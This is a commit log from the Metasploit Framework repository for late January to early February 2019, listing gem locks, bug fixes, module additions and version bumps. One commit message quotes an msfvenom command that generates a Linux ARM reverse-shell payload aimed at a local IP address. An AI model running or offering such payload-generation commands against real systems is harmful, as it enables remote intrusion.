Commit Graph

50392 Commits (59cf8b7211933e6261191079354df788d8321c7e)

Author SHA1 Message Date
Jeffrey Martin 59cf8b7211
update Gemfile.lock newly released gems 2019-02-06 17:41:54 -06:00
Adam Cammack c510d9757d
Land #11363, Lock sqlite3 gem to patch version 2019-02-06 10:55:32 -06:00
Jeffrey Martin 0fe3281094
lock sqlite3 to compatible minor not just major 2019-02-05 23:32:28 -06:00
Adam Cammack fb0d929f42
Land #11362, Lock sqlite3 until binaries are up 2019-02-05 11:36:57 -06:00
Jeffrey Martin fb7ddebd28
restrict sqlite3 gem for windows 2019-02-05 07:34:07 -06:00
Metasploit 5b41c7cccc
automatic module_metadata_base.json update 2019-02-05 05:28:20 -08:00
Jacob Robles 15f624b745
Land #11304, Add CVE-2018-1000999 to MailCleaner module 2019-02-05 07:19:32 -06:00
Metasploit 7cddbcbc65
automatic module_metadata_base.json update 2019-02-04 05:04:46 -08:00
Brent Cook b13129f9fb
Land #11348, Add nil check to enum_patches 2019-02-04 05:25:42 -06:00
Brent Cook ac94557a15
Land #11347, add version check to Safari RCE exploit 2019-02-04 05:22:01 -06:00
Brent Cook fcb4230cf9
Land #11278, Update Travis CI to run remote data service spec tests 2019-02-04 05:17:12 -06:00
Brendan Coles f2d333f3f4
Land #11350, Add missing `to_linux_armle_elf_dll` method to Msf::Util::EXE
Allow generation of ARMLE shared object payloads
2019-02-03 06:24:58 +00:00
Nathan 2d7c075f81
undefined method `to_linux_armle_elf_dll' for Msf::Util::EXE:Class
```
msfvenom -p linux/armle/shell_reverse_tcp lport=1337 lhost=192.168.1.100 -f elf-so > shell.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: armle from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 172 bytes
Error: undefined method `to_linux_armle_elf_dll' for Msf::Util::EXE:Class
Did you mean?  to_linux_armle_elf
               to_linux_x64_elf_dll
               to_linux_x86_elf_dll```
2019-02-03 16:34:30 +11:00
Brendan Coles 28283809f9 Add nil check to enum_patches 2019-02-02 15:33:48 +00:00
Metasploit 3f35c82674
automatic module_metadata_base.json update 2019-02-01 14:38:15 -08:00
bwatters 239cce53ea
Land #11039, Add linux x64 ipv6 reverse shell
Merge branch 'land-11039' into upstream-master
2019-02-01 16:21:24 -06:00
Metasploit 804c441425
Bump version of framework to 5.0.5 2019-02-01 13:44:12 -08:00
Metasploit bb850f7b51
automatic module_metadata_base.json update 2019-02-01 13:29:24 -08:00
Wei Chen 7fe381ac60
Land #11309, Normalize newlines in CommandShell#run_single 2019-02-01 15:17:24 -06:00
William Vu d4211b1399
Land #11343, Ubiquiti discovery PR fixes 2019-02-01 15:11:23 -06:00
William Vu 61b468ac7d Add URL reference to blog post 2019-02-01 14:49:33 -06:00
William Vu 181d61621f Count to five correctly 2019-02-01 14:40:43 -06:00
William Vu 7b88277c6f Prefer case statement over long if block 2019-02-01 14:40:09 -06:00
bwatters 2640ecb4c4
Land #11338, Add module to discover Ubiquiti devices
Merge branch 'land-11338' into upstream-master
2019-02-01 11:40:52 -06:00
Wei Chen ba69a0b26a
Land #11310, MSF API to zip instead of relying on system() 2019-02-01 11:32:20 -06:00
Brendan Coles d9e3fb7d2c
Land #11339, Move command_exists? method to Msf::Post::Common 2019-02-01 16:07:47 +00:00
William Vu 62560f9581 Add rudimentary Windows support to command_exists? 2019-01-31 22:07:30 -06:00
William Vu d0d383c8db Move command_exists? to Msf::Post::Common 2019-01-31 22:04:29 -06:00
Jon Hart f0519a5af5
Minor syntax; add logging for unhandled fields 2019-01-31 18:41:27 -08:00
Metasploit 7633c2832a
Bump version of framework to 5.0.4 2019-01-31 10:05:02 -08:00
bwatters 0feab5520b
Land #13366, Bump mettle 0.5.4
Merge branch 'land-11336' into upstream-master
2019-01-31 11:23:41 -06:00
Jeffrey Martin 5a63e629e4
update payload sizes for mettle 0.5.4 2019-01-31 00:12:45 -06:00
Jeffrey Martin 153d54eb1d
bump mettle gem for liblinenoise / console update 2019-01-31 00:06:27 -06:00
Jon Hart 4681ed9669
Update docs, strip empty essid 2019-01-30 14:31:20 -08:00
Jon Hart 603d2a0c04
Add docs 2019-01-30 14:26:15 -08:00
Jon Hart 96d612fb40
WIP commit on module to disover Ubiquiti devices on 10001/UDP 2019-01-30 14:19:02 -08:00
William Vu 70cc03b707
Land #11329, sessions -k range fix 2019-01-30 11:26:47 -06:00
Brent Cook 2ee7256342
Land #11332, Add support for mettle debug 2019-01-30 11:05:45 -06:00
bwatters 2e7a71ee9b
Add support for mettle debug 2019-01-29 15:13:44 -06:00
Matthew Kienow fbd0412cf0
Increase pool size for remote data service tests 2019-01-29 13:57:54 -05:00
Jeffrey Martin 4e0ea64c96
Land #11330, Fix HTTP/SMB mixin order to restore SSL option 2019-01-29 11:19:38 -06:00
William Vu b7bc52d20b Fix HTTP/SMB mixin order to restore SSL option
Mixin order matters. Mixins kinda suck.
2019-01-29 11:09:34 -06:00
Matthew Kienow 7117e29af7
Update Travis CI to run remote data service tests 2019-01-29 09:39:54 -05:00
Nash van Gool 4059a5f0c7 Changed range array building to correctly parse ranges using - or ..
Fixes #11328
2019-01-29 14:13:10 +01:00
Brent Cook 9fce991d8e
Land #11322, report hostname and OS version for Cisco aux mixin 2019-01-29 05:28:34 -06:00
Brent Cook 96786f435c
Land #11315, fix incorrect API usage of session_setup_clear 2019-01-29 05:26:07 -06:00
Brent Cook 61d677d9e0
Land #11327, disable MSF5 development branch banner 2019-01-29 05:24:43 -06:00
Brent Cook 0e1576acbd
Land #11325, bump mettle, fix MIPS targets and a few other memory issues 2019-01-29 05:22:26 -06:00
Brent Cook 1b9c7ef6ff disable MSF5 development branch banner 2019-01-29 05:19:56 -06:00
William Vu 92e846d09d Chomp user input alone
[1] pry(main)> "\r\n".chomp("\n")
=> ""
[2] pry(main)>

Meh.
2019-01-28 17:46:03 -06:00